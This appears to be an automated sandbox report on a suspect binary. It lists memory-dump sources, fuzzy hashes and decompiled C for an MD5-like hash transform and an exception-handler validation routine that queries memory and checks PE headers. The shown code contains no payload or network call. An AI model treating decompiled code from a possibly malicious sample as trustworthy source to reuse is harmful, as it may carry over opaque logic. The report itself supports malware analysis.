                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c$t32c
                                                          • API String ID: 0-1046649395
                                                          • Opcode ID: 6f17e09b1427cf78a8ed9a689b0777dcdb68ec0f21dac24231d75f354118b123
                                                          • Instruction ID: 6af7748328e4f343c27864947f53148f2f00108cd300ff6e3c6b3ea58bd93dcf
                                                          • Opcode Fuzzy Hash: 6f17e09b1427cf78a8ed9a689b0777dcdb68ec0f21dac24231d75f354118b123
                                                          • Instruction Fuzzy Hash: 44D1153290011AEFDF29DB90DD88BAEB7B5FB88710F1542D6D909A7621D330AE95DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 49%
                                                          			E005E3EE1(void* __ecx, intOrPtr* _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				void _v76;
                                                          				intOrPtr* _t226;
                                                          				signed int _t229;
                                                          				signed int _t231;
                                                          				signed int _t233;
                                                          				signed int _t235;
                                                          				signed int _t237;
                                                          				signed int _t239;
                                                          				signed int _t241;
                                                          				signed int _t243;
                                                          				signed int _t245;
                                                          				signed int _t247;
                                                          				signed int _t249;
                                                          				signed int _t251;
                                                          				signed int _t253;
                                                          				signed int _t255;
                                                          				signed int _t257;
                                                          				signed int _t259;
                                                          				signed int _t338;
                                                          				signed char* _t348;
                                                          				signed int _t349;
                                                          				signed int _t351;
                                                          				signed int _t353;
                                                          				signed int _t355;
                                                          				signed int _t357;
                                                          				signed int _t359;
                                                          				signed int _t361;
                                                          				signed int _t363;
                                                          				signed int _t365;
                                                          				signed int _t367;
                                                          				signed int _t376;
                                                          				signed int _t378;
                                                          				signed int _t380;
                                                          				signed int _t382;
                                                          				signed int _t384;
                                                          				intOrPtr* _t400;
                                                          				signed int* _t401;
                                                          				signed int _t402;
                                                          				signed int _t404;
                                                          				signed int _t406;
                                                          				signed int _t408;
                                                          				signed int _t410;
                                                          				signed int _t412;
                                                          				signed int _t414;
                                                          				signed int _t416;
                                                          				signed int _t418;
                                                          				signed int _t420;
                                                          				signed int _t422;
                                                          				signed int _t424;
                                                          				signed int _t432;
                                                          				signed int _t434;
                                                          				signed int _t436;
                                                          				signed int _t438;
                                                          				signed int _t440;
                                                          				signed int _t508;
                                                          				signed int _t599;
                                                          				signed int _t607;
                                                          				signed int _t613;
                                                          				signed int _t679;
                                                          				void* _t682;
                                                          				signed int _t683;
                                                          				signed int _t685;
                                                          				signed int _t690;
                                                          				signed int _t692;
                                                          				signed int _t697;
                                                          				signed int _t699;
                                                          				signed int _t718;
                                                          				signed int _t720;
                                                          				signed int _t722;
                                                          				signed int _t724;
                                                          				signed int _t726;
                                                          				signed int _t728;
                                                          				signed int _t734;
                                                          				signed int _t740;
                                                          				signed int _t742;
                                                          				signed int _t744;
                                                          				signed int _t746;
                                                          				signed int _t748;
                                                          
                                                          				_t226 = _a4;
                                                          				_t348 = __ecx + 2;
                                                          				_t401 =  &_v76;
                                                          				_t682 = 0x10;
                                                          				do {
                                                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                          					_t401 =  &(_t401[1]);
                                                          					_t348 =  &(_t348[4]);
                                                          					_t682 = _t682 - 1;
                                                          				} while (_t682 != 0);
                                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                                          				_t683 =  *_t6;
                                                          				_t7 = _t226 + 8; // 0x8d08458b
                                                          				_t402 =  *_t7;
                                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                                          				_t349 =  *_t8;
                                                          				asm("rol eax, 0x7");
                                                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                          				asm("rol ecx, 0xc");
                                                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                          				asm("ror edx, 0xf");
                                                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                          				asm("ror esi, 0xa");
                                                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                          				_v8 = _t685;
                                                          				_t690 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                          				asm("rol ecx, 0xc");
                                                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                          				asm("ror edx, 0xf");
                                                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                          				asm("ror esi, 0xa");
                                                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                          				_v8 = _t692;
                                                          				_t697 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                          				asm("rol ecx, 0xc");
                                                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                          				asm("ror edx, 0xf");
                                                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                          				asm("ror esi, 0xa");
                                                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                          				_v8 = _t699;
                                                          				asm("rol eax, 0x7");
                                                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                          				asm("rol ecx, 0xc");
                                                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                          				_t508 =  !_t357;
                                                          				asm("ror edx, 0xf");
                                                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                          				_v12 = _t410;
                                                          				_v12 =  !_v12;
                                                          				asm("ror esi, 0xa");
                                                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                          				asm("rol eax, 0x5");
                                                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                          				asm("rol ecx, 0x9");
                                                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                          				asm("rol edx, 0xe");
                                                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                          				asm("ror esi, 0xc");
                                                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                          				asm("rol eax, 0x5");
                                                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                          				asm("rol ecx, 0x9");
                                                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                          				asm("rol edx, 0xe");
                                                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                          				asm("ror esi, 0xc");
                                                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                          				asm("rol eax, 0x5");
                                                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                          				asm("rol ecx, 0x9");
                                                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                          				asm("rol edx, 0xe");
                                                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                          				asm("ror esi, 0xc");
                                                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                          				asm("rol eax, 0x5");
                                                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                          				asm("rol ecx, 0x9");
                                                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                          				asm("rol edx, 0xe");
                                                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                          				asm("ror esi, 0xc");
                                                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                          				asm("rol eax, 0x4");
                                                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                          				asm("rol ecx, 0xb");
                                                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                          				asm("rol edx, 0x10");
                                                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                          				_t599 = _t367 ^ _t420;
                                                          				asm("ror esi, 0x9");
                                                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                          				asm("rol eax, 0x4");
                                                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                          				asm("rol edi, 0xb");
                                                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                          				asm("rol edx, 0x10");
                                                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                          				_t338 = _t607 ^ _t422;
                                                          				asm("ror ecx, 0x9");
                                                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                          				asm("rol eax, 0x4");
                                                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                          				asm("rol esi, 0xb");
                                                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                          				asm("rol edi, 0x10");
                                                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                          				_t424 = _t734 ^ _t613;
                                                          				asm("ror ecx, 0x9");
                                                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                          				asm("rol eax, 0x4");
                                                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                          				asm("rol edx, 0xb");
                                                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                          				asm("rol esi, 0x10");
                                                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                          				asm("ror ecx, 0x9");
                                                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                          				asm("rol eax, 0x6");
                                                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                          				asm("rol edx, 0xa");
                                                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                          				asm("rol esi, 0xf");
                                                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                          				asm("ror ecx, 0xb");
                                                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                          				asm("rol eax, 0x6");
                                                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                          				asm("rol edx, 0xa");
                                                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                          				asm("rol esi, 0xf");
                                                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                          				asm("ror ecx, 0xb");
                                                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                          				asm("rol eax, 0x6");
                                                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                          				asm("rol edx, 0xa");
                                                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                          				asm("rol esi, 0xf");
                                                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                          				asm("ror edi, 0xb");
                                                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                          				asm("rol eax, 0x6");
                                                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                          				asm("rol edx, 0xa");
                                                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                          				_t400 = _a4;
                                                          				asm("rol esi, 0xf");
                                                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                          				 *_t400 =  *_t400 + _t259;
                                                          				asm("ror eax, 0xb");
                                                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                          				return memset( &_v76, 0, 0x40);
                                                          			}
                                                          0x005e4393
                                                          0x005e4396
                                                          0x005e43a8
                                                          0x005e43ab
                                                          0x005e43b9
                                                          0x005e43bc
                                                          0x005e43ce
                                                          0x005e43d1
                                                          0x005e43e3
                                                          0x005e43e6
                                                          0x005e43fa
                                                          0x005e43fd
                                                          0x005e4411
                                                          0x005e4414
                                                          0x005e4428
                                                          0x005e442b
                                                          0x005e443f
                                                          0x005e4442
                                                          0x005e4456
                                                          0x005e4459
                                                          0x005e446d
                                                          0x005e4472
                                                          0x005e4484
                                                          0x005e4487
                                                          0x005e449b
                                                          0x005e449e
                                                          0x005e44b2
                                                          0x005e44b5
                                                          0x005e44cb
                                                          0x005e44ce
                                                          0x005e44e2
                                                          0x005e44e5
                                                          0x005e44f7
                                                          0x005e44fa
                                                          0x005e450e
                                                          0x005e4511
                                                          0x005e4525
                                                          0x005e4528
                                                          0x005e453c
                                                          0x005e4545
                                                          0x005e4548
                                                          0x005e4551
                                                          0x005e455a
                                                          0x005e4562
                                                          0x005e456a
                                                          0x005e4574
                                                          0x005e4589

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
                                                          • Instruction ID: a6b1c67b297951171fb0934eee39aa618fd264c425d8cac8957dcfd550bd45d0
                                                          • Opcode Fuzzy Hash: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
                                                          • Instruction Fuzzy Hash: DE22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E100023A5(long _a4) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				short* _v32;
                                                          				void _v36;
                                                          				void* _t57;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				void* _t63;
                                                          				signed int* _t68;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr _t72;
                                                          				intOrPtr _t75;
                                                          				void* _t76;
                                                          				signed int _t77;
                                                          				void* _t78;
                                                          				void _t80;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t86;
                                                          				short* _t87;
                                                          				void* _t89;
                                                          				signed int* _t90;
                                                          				long _t91;
                                                          				signed int _t93;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				void* _t104;
                                                          				long _t108;
                                                          				signed int _t110;
                                                          
                                                          				_t108 = _a4;
                                                          				_t76 =  *(_t108 + 8);
                                                          				if((_t76 & 0x00000003) != 0) {
                                                          					L3:
                                                          					return 0;
                                                          				}
                                                          				_a4 =  *[fs:0x4];
                                                          				_v8 =  *[fs:0x8];
                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                          					_t102 =  *(_t108 + 0xc);
                                                          					__eflags = _t102 - 0xffffffff;
                                                          					if(_t102 != 0xffffffff) {
                                                          						_t91 = 0;
                                                          						__eflags = 0;
                                                          						_a4 = 0;
                                                          						_t57 = _t76;
                                                          						do {
                                                          							_t80 =  *_t57;
                                                          							__eflags = _t80 - 0xffffffff;
                                                          							if(_t80 == 0xffffffff) {
                                                          								goto L9;
                                                          							}
                                                          							__eflags = _t80 - _t91;
                                                          							if(_t80 >= _t91) {
                                                          								L20:
                                                          								_t63 = 0;
                                                          								L60:
                                                          								return _t63;
                                                          							}
                                                          							L9:
                                                          							__eflags =  *(_t57 + 4);
                                                          							if( *(_t57 + 4) != 0) {
                                                          								_t12 =  &_a4;
                                                          								 *_t12 = _a4 + 1;
                                                          								__eflags =  *_t12;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t57 = _t57 + 0xc;
                                                          							__eflags = _t91 - _t102;
                                                          						} while (_t91 <= _t102);
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L15:
                                                          							_t81 =  *0x10004178;
                                                          							_t110 = _t76 & 0xfffff000;
                                                          							_t58 = 0;
                                                          							__eflags = _t81;
                                                          							if(_t81 <= 0) {
                                                          								L18:
                                                          								_t104 = _t102 | 0xffffffff;
                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                          								__eflags = _t61;
                                                          								if(_t61 < 0) {
                                                          									_t62 = 0;
                                                          									__eflags = 0;
                                                          								} else {
                                                          									_t62 = _a4;
                                                          								}
                                                          								__eflags = _t62;
                                                          								if(_t62 == 0) {
                                                          									L59:
                                                          									_t63 = _t104;
                                                          									goto L60;
                                                          								} else {
                                                          									__eflags = _v12 - 0x1000000;
                                                          									if(_v12 != 0x1000000) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags = _v16 & 0x000000cc;
                                                          									if((_v16 & 0x000000cc) == 0) {
                                                          										L46:
                                                          										_t63 = 1;
                                                          										 *0x100041c0 = 1;
                                                          										__eflags =  *0x100041c0;
                                                          										if( *0x100041c0 != 0) {
                                                          											goto L60;
                                                          										}
                                                          										_t84 =  *0x10004178;
                                                          										__eflags = _t84;
                                                          										_t93 = _t84;
                                                          										if(_t84 <= 0) {
                                                          											L51:
                                                          											__eflags = _t93;
                                                          											if(_t93 != 0) {
                                                          												L58:
                                                          												 *0x100041c0 = 0;
                                                          												goto L5;
                                                          											}
                                                          											_t77 = 0xf;
                                                          											__eflags = _t84 - _t77;
                                                          											if(_t84 <= _t77) {
                                                          												_t77 = _t84;
                                                          											}
                                                          											_t94 = 0;
                                                          											__eflags = _t77;
                                                          											if(_t77 < 0) {
                                                          												L56:
                                                          												__eflags = _t84 - 0x10;
                                                          												if(_t84 < 0x10) {
                                                          													_t86 = _t84 + 1;
                                                          													__eflags = _t86;
                                                          													 *0x10004178 = _t86;
                                                          												}
                                                          												goto L58;
                                                          											} else {
                                                          												do {
                                                          													_t68 = 0x10004180 + _t94 * 4;
                                                          													_t94 = _t94 + 1;
                                                          													__eflags = _t94 - _t77;
                                                          													 *_t68 = _t110;
                                                          													_t110 =  *_t68;
                                                          												} while (_t94 <= _t77);
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          										_t69 = 0x1000417c + _t84 * 4;
                                                          										while(1) {
                                                          											__eflags =  *_t69 - _t110;
                                                          											if( *_t69 == _t110) {
                                                          												goto L51;
                                                          											}
                                                          											_t93 = _t93 - 1;
                                                          											_t69 = _t69 - 4;
                                                          											__eflags = _t93;
                                                          											if(_t93 > 0) {
                                                          												continue;
                                                          											}
                                                          											goto L51;
                                                          										}
                                                          										goto L51;
                                                          									}
                                                          									_t87 = _v32;
                                                          									__eflags =  *_t87 - 0x5a4d;
                                                          									if( *_t87 != 0x5a4d) {
                                                          										goto L59;
                                                          									}
                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                          									__eflags =  *_t71 - 0x4550;
                                                          									if( *_t71 != 0x4550) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                          										goto L59;
                                                          									}
                                                          									_t78 = _t76 - _t87;
                                                          									__eflags =  *((short*)(_t71 + 6));
                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                          										goto L59;
                                                          									}
                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                          									__eflags = _t78 - _t72;
                                                          									if(_t78 < _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                          										goto L20;
                                                          									}
                                                          									goto L46;
                                                          								}
                                                          							} else {
                                                          								goto L16;
                                                          							}
                                                          							while(1) {
                                                          								L16:
                                                          								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 + 1;
                                                          								__eflags = _t58 - _t81;
                                                          								if(_t58 < _t81) {
                                                          									continue;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(_t58 <= 0) {
                                                          								goto L5;
                                                          							}
                                                          							 *0x100041c0 = 1;
                                                          							__eflags =  *0x100041c0;
                                                          							if( *0x100041c0 != 0) {
                                                          								goto L5;
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                          							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                          								L32:
                                                          								_t100 = 0;
                                                          								__eflags = _t58;
                                                          								if(_t58 < 0) {
                                                          									L34:
                                                          									 *0x100041c0 = 0;
                                                          									goto L5;
                                                          								} else {
                                                          									goto L33;
                                                          								}
                                                          								do {
                                                          									L33:
                                                          									_t90 = 0x10004180 + _t100 * 4;
                                                          									_t100 = _t100 + 1;
                                                          									__eflags = _t100 - _t58;
                                                          									 *_t90 = _t110;
                                                          									_t110 =  *_t90;
                                                          								} while (_t100 <= _t58);
                                                          								goto L34;
                                                          							}
                                                          							_t58 = _t81 - 1;
                                                          							__eflags = _t58;
                                                          							if(_t58 < 0) {
                                                          								L28:
                                                          								__eflags = _t81 - 0x10;
                                                          								if(_t81 < 0x10) {
                                                          									_t81 = _t81 + 1;
                                                          									__eflags = _t81;
                                                          									 *0x10004178 = _t81;
                                                          								}
                                                          								_t58 = _t81 - 1;
                                                          								goto L32;
                                                          							} else {
                                                          								goto L25;
                                                          							}
                                                          							while(1) {
                                                          								L25:
                                                          								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 - 1;
                                                          								__eflags = _t58;
                                                          								if(_t58 >= 0) {
                                                          									continue;
                                                          								}
                                                          								break;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(__eflags >= 0) {
                                                          								if(__eflags == 0) {
                                                          									goto L34;
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							goto L28;
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                          						__eflags = _t75 - _v8;
                                                          						if(_t75 < _v8) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t75 - _t108;
                                                          						if(_t75 >= _t108) {
                                                          							goto L20;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					L5:
                                                          					_t63 = 1;
                                                          					goto L60;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





































                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002456
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
                                                          • Instruction ID: d6971719ee8f1b9f11e38fe3953f76bbe497b20de1934e034d516acabf99b4ad
                                                          • Opcode Fuzzy Hash: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
                                                          • Instruction Fuzzy Hash: AC61EE70A00A56DFFB19CF28DCE065933E5EB853D5F228469D806C729DEB30DD828754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005EB1A5(long _a4) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				short* _v32;
                                                          				void _v36;
                                                          				void* _t57;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				void* _t63;
                                                          				signed int* _t68;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr _t72;
                                                          				intOrPtr _t75;
                                                          				void* _t76;
                                                          				signed int _t77;
                                                          				void* _t78;
                                                          				void _t80;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t86;
                                                          				short* _t87;
                                                          				void* _t89;
                                                          				signed int* _t90;
                                                          				long _t91;
                                                          				signed int _t93;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				void* _t104;
                                                          				long _t108;
                                                          				signed int _t110;
                                                          
                                                          				_t108 = _a4;
                                                          				_t76 =  *(_t108 + 8);
                                                          				if((_t76 & 0x00000003) != 0) {
                                                          					L3:
                                                          					return 0;
                                                          				}
                                                          				_a4 =  *[fs:0x4];
                                                          				_v8 =  *[fs:0x8];
                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                          					_t102 =  *(_t108 + 0xc);
                                                          					__eflags = _t102 - 0xffffffff;
                                                          					if(_t102 != 0xffffffff) {
                                                          						_t91 = 0;
                                                          						__eflags = 0;
                                                          						_a4 = 0;
                                                          						_t57 = _t76;
                                                          						do {
                                                          							_t80 =  *_t57;
                                                          							__eflags = _t80 - 0xffffffff;
                                                          							if(_t80 == 0xffffffff) {
                                                          								goto L9;
                                                          							}
                                                          							__eflags = _t80 - _t91;
                                                          							if(_t80 >= _t91) {
                                                          								L20:
                                                          								_t63 = 0;
                                                          								L60:
                                                          								return _t63;
                                                          							}
                                                          							L9:
                                                          							__eflags =  *(_t57 + 4);
                                                          							if( *(_t57 + 4) != 0) {
                                                          								_t12 =  &_a4;
                                                          								 *_t12 = _a4 + 1;
                                                          								__eflags =  *_t12;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t57 = _t57 + 0xc;
                                                          							__eflags = _t91 - _t102;
                                                          						} while (_t91 <= _t102);
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L15:
                                                          							_t81 =  *0x5ed2e0; // 0x0
                                                          							_t110 = _t76 & 0xfffff000;
                                                          							_t58 = 0;
                                                          							__eflags = _t81;
                                                          							if(_t81 <= 0) {
                                                          								L18:
                                                          								_t104 = _t102 | 0xffffffff;
                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
